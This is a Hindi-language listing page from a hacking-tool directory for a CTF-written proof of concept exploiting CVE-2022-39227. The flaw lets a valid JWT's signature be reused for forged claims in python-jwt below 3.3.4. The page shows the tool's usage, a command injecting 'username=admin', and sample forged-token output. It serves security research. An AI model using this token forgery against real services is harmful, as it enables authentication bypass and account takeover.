Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-39227 — CVE-2022-39227 : अवधारणा प्रमाण | Kitploit
उपकरण/GitHubGitHub/user0x1337/cve-2022-39227
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब सुरक्षाCTFप्रमाणीकरण
GitHubuser0x1337/cve-2022-39227

CVE-2022-39227

CVE-2022-39227 : अवधारणा प्रमाण

रिपॉजिटरी देखें
221122 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-39227

CVE-2022-39227 : प्रूफ ऑफ कॉन्सेप्ट

CVE-2022-39227 के लिए प्रूफ ऑफ कॉन्सेप्ट। इस CVE के अनुसार, JSON वेब टोकन सत्यापन में एक त्रुटि है। एक वैध टोकन के साथ संशोधित दावों (claims) के लिए उसके हस्ताक्षर का पुनः उपयोग करना संभव है।

आवश्यक:

  1. एक वैध JSON वेब टोकन।
  2. बैकएंड को "python-jwt" पायथन लाइब्रेरी के संस्करण < 3.3.4 का उपयोग करना चाहिए।

उपयोग में आसानी के लिए मैंने एक CTF के दौरान एक सरल PoC लिखा:

usage: CVE-2022-39227-PoC [-h] -j TOKEN -i CLAIM

Proof of Concept for the JWT verification bug in python-jwt version < 3.3.4

options:
  -h, --help            show this help message and exit
  -j TOKEN, --jwt_token TOKEN
                        Original and valid JWT Token returned by the application
  -i CLAIM, --injected_claim CLAIM
                        Inject claim using the form "key=value", e.g. "username=admin". Use "," for more claims
                        (e.g. username=admin,id=3)

उपयोग:

python3 cve_2022_39227.py -j <JWT-WEBTOKEN> -i "<KEY>=<VALUE>"

परिणाम:

{"  <SNIP>":"","protected":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9", "payload":"<SNIP>","signature":"18-caQyY-mnreIUb53kk5qI-axRoxSzQKyT033yOdUw"}

वापसी मान JSON और कॉम्पैक्ट प्रतिनिधित्व का एक मिश्रित रूप है। आपको पूरे मान को "{" और "}" सहित अपने नए JWT वेब टोकन के रूप में पेस्ट करना होगा।

टूल डाउनलोड करें